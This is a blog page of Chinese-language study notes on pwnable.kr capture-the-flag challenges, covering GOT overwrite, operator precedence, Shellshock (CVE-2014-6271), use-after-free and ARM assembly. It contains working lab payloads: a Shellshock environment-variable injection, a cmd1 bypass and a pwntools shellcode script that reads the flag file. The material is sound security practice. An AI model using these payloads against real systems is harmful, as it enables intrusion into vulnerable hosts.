<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">
  

  
  <title>Gumeng&#39;s Blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="passcode知识点：scanf函数输入问题，会把栈上存储内容的地址作为&amp;amp;地址来使用GOT 复写技术，讲GOT中的偏移写入system地址附近，然后函数在调用下一某个函数（printf，fflush等函数的时候），反正是在这次scanf之后存在的某个函数 804858b:    a1 2c a0 04 08           mov    0x804a02c,%eax 8048590:">
<meta name="keywords" content="Pwn,ICS,Dev">
<meta property="og:type" content="article">
<meta property="og:title" content="Gumeng&#39;s Blog">
<meta property="og:url" content="http://gumeng.fun/2018/10/24/2017-08-31-pwnable.kr学习/index.html">
<meta property="og:site_name" content="Gumeng&#39;s Blog">
<meta property="og:description" content="passcode知识点：scanf函数输入问题，会把栈上存储内容的地址作为&amp;amp;地址来使用GOT 复写技术，讲GOT中的偏移写入system地址附近，然后函数在调用下一某个函数（printf，fflush等函数的时候），反正是在这次scanf之后存在的某个函数 804858b:    a1 2c a0 04 08           mov    0x804a02c,%eax 8048590:">
<meta property="og:locale" content="En">
<meta property="og:updated_time" content="2018-10-24T15:45:58.074Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Gumeng&#39;s Blog">
<meta name="twitter:description" content="passcode知识点：scanf函数输入问题，会把栈上存储内容的地址作为&amp;amp;地址来使用GOT 复写技术，讲GOT中的偏移写入system地址附近，然后函数在调用下一某个函数（printf，fflush等函数的时候），反正是在这次scanf之后存在的某个函数 804858b:    a1 2c a0 04 08           mov    0x804a02c,%eax 8048590:">
  
    <link rel="alternate" href="/atom.xml" title="Gumeng&#39;s Blog" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  <link rel="stylesheet" href="/css/style.css">
<link rel="stylesheet" href="/css/prism.css" type="text/css"></head>
</html>
<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Gumeng&#39;s Blog</a>
      </h1>
      
        <h2 id="subtitle-wrap">
          <a href="/" id="subtitle">Pwner in ICS, Python Exploit developer</a>
        </h2>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://gumeng.fun"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-2017-08-31-pwnable.kr学习" class="article article-type-post" itemscope="" itemprop="blogPost">
  <div class="article-meta">
    <a href="/2018/10/24/2017-08-31-pwnable.kr学习/" class="article-date">
  <time datetime="2018-10-24T15:45:58.072Z" itemprop="datePublished">2018-10-24</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
    <div class="article-entry" itemprop="articleBody">
      
        <h2 id="passcode"><a href="#passcode" class="headerlink" title="passcode"></a>passcode</h2><p>知识点：<br>scanf函数输入问题，会把栈上存储内容的地址作为&amp;地址来使用<br>GOT 复写技术，讲GOT中的偏移写入system地址附近，然后函数在调用下一某个函数（printf，fflush等函数的时候），反正是在这次scanf之后存在的某个函数</p>
<pre><code>804858b:    a1 2c a0 04 08           mov    0x804a02c,%eax
8048590:    89 04 24                 mov    %eax,(%esp)
8048593:    e8 98 fe ff ff           call   8048430 &lt;fflush@plt&gt;
8048598:    b8 86 87 04 08           mov    $0x8048786,%eax
804859d:    89 04 24                 mov    %eax,(%esp)
80485a0:    e8 7b fe ff ff           call   8048420 &lt;printf@plt&gt;
</code></pre><p>复写printf()函数<br><a href="http://m.blog.csdn.net/qq_33528164/article/details/70505151" target="_blank" rel="noopener">http://m.blog.csdn.net/qq_33528164/article/details/70505151</a></p>
<p>复写fflush函数，同样的方法，讲fflush的GOT表中的地址覆盖成system地址</p>
<p>攻击实现的前提：GOT可改，可以通过函数实现对GOT的改写</p>
<p>如何发现漏洞：编译c文件，往往编译器给的提示就是错误信息</p>
<pre><code>root@ubuntu:~/Desktop/pwnable_kr/passcode# gcc -o password1 passcode.c
passcode.c: In function ‘login’:
passcode.c:9:8: warning: format ‘%d’ expects argument of type ‘int *’, but argument 2 has type ‘int’ [-Wformat=]
  scanf(&quot;%d&quot;, passcode1);
        ^
passcode.c:14:15: warning: format ‘%d’ expects argument of type ‘int *’, but argument 2 has type ‘int’ [-Wformat=]
         scanf(&quot;%d&quot;, passcode2);
</code></pre><p>可以第二个参数存在问题，需要&amp;取地址符号，没有就导致了scanf把esp开辟的栈空间中的地址当做需要写入的地址来执行，当前会报段错误！！！！</p>
<h1 id="random"><a href="#random" class="headerlink" title="random"></a>random</h1><p>知识点：rand()随机化在同一主机是不会改变的，gdb一下就可以得到结果</p>
<h1 id="input2"><a href="#input2" class="headerlink" title="input2"></a>input2</h1><p>知识点：对linux文件输入参数的考察，输入的参数包括形参数量，参数本身，环境变量，文件读写，stdio输入输出，pipe管道输入参数等等。</p>
<h1 id="leg"><a href="#leg" class="headerlink" title="leg"></a>leg</h1><p>知识点：ARM汇编<br>参考：<br><a href="http://www.tuicool.com/articles/bERfu2m" target="_blank" rel="noopener">http://www.tuicool.com/articles/bERfu2m</a> 相对比较详细<br><a href="http://blog.csdn.net/qq_19550513/article/details/62044968" target="_blank" rel="noopener">http://blog.csdn.net/qq_19550513/article/details/62044968</a><br><a href="http://blog.csdn.net/lee244868149/article/details/49488575" target="_blank" rel="noopener">http://blog.csdn.net/lee244868149/article/details/49488575</a> ARM指针PC相关小问题（学习之）</p>
<p>具体知识点：</p>
<p>其他：<br>ARM状态此时处理器执行32位的字对齐的ARM指令，Thumb状态此时处理器执行16位的，半字对齐的THUMB指令。 切换程序：从ARM到Thumb: LDR R0,=lable+1 BX R0 从ARM到Thumb: LDR R0,=lable BX R0</p>
<p>key1：</p>
<p>arm汇编是以r0作为函数的返回值的，pc的值为当前地址+8 即0x00008cdc+ 8</p>
<p>key2：<br>    0x00008d00 &lt;+16&gt;:    bx      r6<br>    0x00008d04 &lt;+20&gt;:    mov     r3, pc<br>    0x00008d06 &lt;+22&gt;:    adds    r3, #4<br>    ……<br>0x00008d10  &lt;+32&gt;:   mov r0, r3<br>r6 = 0x00008cfc + 8 +1 = 0x00008d04。 bx r6在r6地址处切换成thumb模式。在thumb模式下pc = 当前地址+4。r0 =r3 = 0x00008d04 +4+4</p>
<p>key3：</p>
<pre><code>0x00008d28 &lt;+8&gt;:     mov     r3, lr                                        
0x00008d2c &lt;+12&gt;:    mov     r0, r3
</code></pre><p>r0等于lr即key3()函数的返回地址0x00008d80。</p>
<p>特殊点：<br>lr地址的问题：<br>参考<a href="http://blog.csdn.net/lee244868149/article/details/49488575，根据不同的指令，lr地址会变化，" target="_blank" rel="noopener">http://blog.csdn.net/lee244868149/article/details/49488575，根据不同的指令，lr地址会变化，</a></p>
<p>因此得到值为：<br>0x8ce4+0x8d0c+0x8d80=108400(d)</p>
<h1 id="mistake"><a href="#mistake" class="headerlink" title="mistake"></a>mistake</h1><p>知识点：</p>
<pre><code>if(fd=open(&quot;/home/mistake/password&quot;,O_RDONLY,0400) &lt; 0){
if(!(len=read(fd,pw_buf,PW_LEN) &gt; 0)){
</code></pre><p>In C, the file descriptor 0 indicates the stdin file stream. Because fd is always 0, read() will copy the content of the stdin stream to pw_buf!<br>C原因中，&lt;  &gt; 的优先级比=高，因此，这个话永远也是fd=0，当fd=0时，表示从stdio中输入，因此第一个我们可以从标准输入输入一个长度为10的字符串，然后异或后：</p>
<pre><code>mistake@ubuntu:~$ ./mistake
do not bruteforce...
0000000000
111input password :1111111111
Password OK
Mommy, the operator priority always confuses me :(
</code></pre><h1 id="shellshock"><a href="#shellshock" class="headerlink" title="shellshock"></a>shellshock</h1><p>CVE-2014-6271 </p>
<p><a href="http://ydc1992.github.io/2016/04/03/Pwnable-kr-shellshock/" target="_blank" rel="noopener">http://ydc1992.github.io/2016/04/03/Pwnable-kr-shellshock/</a><br><a href="http://devco.re/blog/2014/09/30/shellshock-CVE-2014-6271/" target="_blank" rel="noopener">http://devco.re/blog/2014/09/30/shellshock-CVE-2014-6271/</a><br><a href="https://coolshell.cn/articles/11973.html" target="_blank" rel="noopener">https://coolshell.cn/articles/11973.html</a></p>
<p>挖掘该漏洞的方法论： 深入了解bash源码，对bash处理env了如执掌啊</p>
<p>env 环境变量的处理问题，(){ 会被处理成为函数开头，虽然你输入的只是参数，导致代码注入，可以开个反向端口或者shell<br>一般常用的payload是：</p>
<pre><code>&apos;(){:;};echo flag&apos;
&apos;:&apos;相当于/bin/true 
() { :;} 中的冒号就相当于/bin/true，返回true并退出。
</code></pre><p>构造payload：</p>
<pre><code>env x=&apos;() { :;}; /bin/cat flag&apos; ./shellshock
</code></pre><h1 id="coin1"><a href="#coin1" class="headerlink" title="coin1"></a>coin1</h1><p>二分查找，参见代码</p>
<p>关键点：</p>
<p>算法考察，在目标机器运行，否则会很慢，网络延时太大</p>
<h1 id="balckjack"><a href="#balckjack" class="headerlink" title="balckjack"></a>balckjack</h1><p>对输入参数的大小比较判断，读懂题目</p>
<h1 id="lotto"><a href="#lotto" class="headerlink" title="lotto"></a>lotto</h1><p>题目考点：</p>
<p>/dev/urandom 产生系统噪声的随机数，通过读这个文件，可以获取随机数。</p>
<p>ascii中0-31（127）是控制字符，其余都是可见字符，再结合题目中说，给出6个小于46的数字，因此把范围缩小到31-46自字段。</p>
<p>目标机器是tmp文件下不可‘ls’命令，但是文件确实存在可以盲打。</p>
<h1 id="cmd1"><a href="#cmd1" class="headerlink" title="cmd1"></a>cmd1</h1><p>题目考点：</p>
<p>环境变量，通过$符号来获取</p>
<p>通关参数：</p>
<p>cmd1@ubuntu:~$ env x=’/bin/cat /home/cmd1/flag’ ./cmd1 “\$x”</p>
<p>mommy now I get what PATH environment is for :)</p>
<p>通关密码</p>
<p>类似shellshock漏洞</p>
<h1 id="uaf"><a href="#uaf" class="headerlink" title="uaf"></a>uaf</h1><p>漏洞：use after free 漏洞</p>
<p>考点： C++ 中虚函数内存排布，C++中堆释放顺序，堆的调用利用顺序，这些都是基础知识。</p>
<h1 id="memcpy"><a href="#memcpy" class="headerlink" title="memcpy"></a>memcpy</h1><p>参考：<a href="https://etenal.me/archives/972#C18" target="_blank" rel="noopener">https://etenal.me/archives/972#C18</a></p>
<p>源码：<a href="http://pwnable.kr/bin/memcpy.c" target="_blank" rel="noopener">http://pwnable.kr/bin/memcpy.c</a></p>
<p><a href="https://github.com/Macmod/pwnable-writeups/blob/master/toddlers/memcpy.md" target="_blank" rel="noopener">https://github.com/Macmod/pwnable-writeups/blob/master/toddlers/memcpy.md</a><br>需要加入 8 字节，需要尝试</p>
<p><a href="http://pwdme.cc/2017/04/19/pwnable-kr-toddlers-bottle-3/" target="_blank" rel="noopener">http://pwdme.cc/2017/04/19/pwnable-kr-toddlers-bottle-3/</a><br>这个里面对 int（（x + 4)/8+1），可能是有错误，但是整个数据还是很多</p>
<p>漏洞：需要输入的参数是16字节对齐，因此需要输入的参数是16的倍数。<br>但是关于对齐还是不是很懂，还需要调试一下，才能明白</p>
<h1 id="asm"><a href="#asm" class="headerlink" title="asm"></a>asm</h1><p>shellcode编写采用</p>
<p><a href="https://github.com/Macmod/pwnable-writeups/blob/master/toddlers/asm.md" target="_blank" rel="noopener">https://github.com/Macmod/pwnable-writeups/blob/master/toddlers/asm.md</a></p>
<p>直接用pwntools提供的工具比较简单，加入需要自己手工写shellcode还是可以滴，但是相对比较难而已。<br>但是作为hacker，这个技能还是得会的。</p>
<p>代码贴出来：</p>
<pre><code>from pwn import *

con = ssh(host=&apos;pwnable.kr&apos;, user=&apos;asm&apos;, password=&apos;guest&apos;, port=2222)
p = con.connect_remote(&apos;localhost&apos;, 9026)
context(arch=&apos;amd64&apos;, os=&apos;linux&apos;)
shellcode = &apos;&apos;
shellcode += shellcraft.pushstr(&apos;this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong&apos;)

shellcode += shellcraft.open(&apos;rsp&apos;, 0, 0) #rsp 保存到栈顶
shellcode += shellcraft.read(&apos;rax&apos;, &apos;rsp&apos;, 100) #rsp 读出rax的值然后输入到rsp上
shellcode += shellcraft.write(1, &apos;rsp&apos;, 100) # 
#linux 0---&gt;stdin,1---&gt;stdout,2---&gt;stderr.write(1,&apos;rsp&apos;,100)
# log.info(shellcode)
p.recvuntil(&apos;shellcode: &apos;)
print (shellcode+&apos;\n&apos;)
p.send(asm(shellcode))
log.success(p.recvline())
</code></pre><p>大家可以打印出来，看看的shellcode具体汇编代码，顺便学习一下汇编shellcode的写法(64位程序的写法)</p>
<h1 id="unlink"><a href="#unlink" class="headerlink" title="unlink"></a>unlink</h1><pre><code>^
</code></pre>
      
    </div>
    <footer class="article-footer">
      <a data-url="http://gumeng.fun/2018/10/24/2017-08-31-pwnable.kr学习/" data-id="cjtimehbu000v5waixwn4oi0e" class="article-share-link">Share</a>
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2018/10/24/2017-08-31-pwnable.tw之orw/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          (no title)
        
      </div>
    </a>
  
  
    <a href="/2018/10/24/2017-08-26-讲解内容/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title"></div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list"><li class="tag-list-item"><a class="tag-list-link" href="/tags/Blog/">Blog</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Heap-Pwn/">Heap Pwn</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Pwn/">Pwn</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/Blog/" style="font-size: 20px;">Blog</a> <a href="/tags/Heap-Pwn/" style="font-size: 10px;">Heap Pwn</a> <a href="/tags/Pwn/" style="font-size: 10px;">Pwn</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/10/">October 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/01/">January 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/10/">October 2017</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/08/">August 2017</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2018/10/24/2018-10-24-escape/">escape</a>
          </li>
        
          <li>
            <a href="/2018/10/24/pip丢失问题/">(no title)</a>
          </li>
        
          <li>
            <a href="/2018/10/24/ROP攻击技术/">(no title)</a>
          </li>
        
          <li>
            <a href="/2018/10/24/2018-02-07-Ubuntu 16.04 搭建ARM 9 测试环境/">(no title)</a>
          </li>
        
          <li>
            <a href="/2018/10/24/2017-08-31-scapy fuzz部分源码解析/">(no title)</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2019 Gumeng<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  <script src="/fancybox/jquery.fancybox.pack.js"></script>


<script src="/js/script.js"></script>



  </div>
</body>
</html>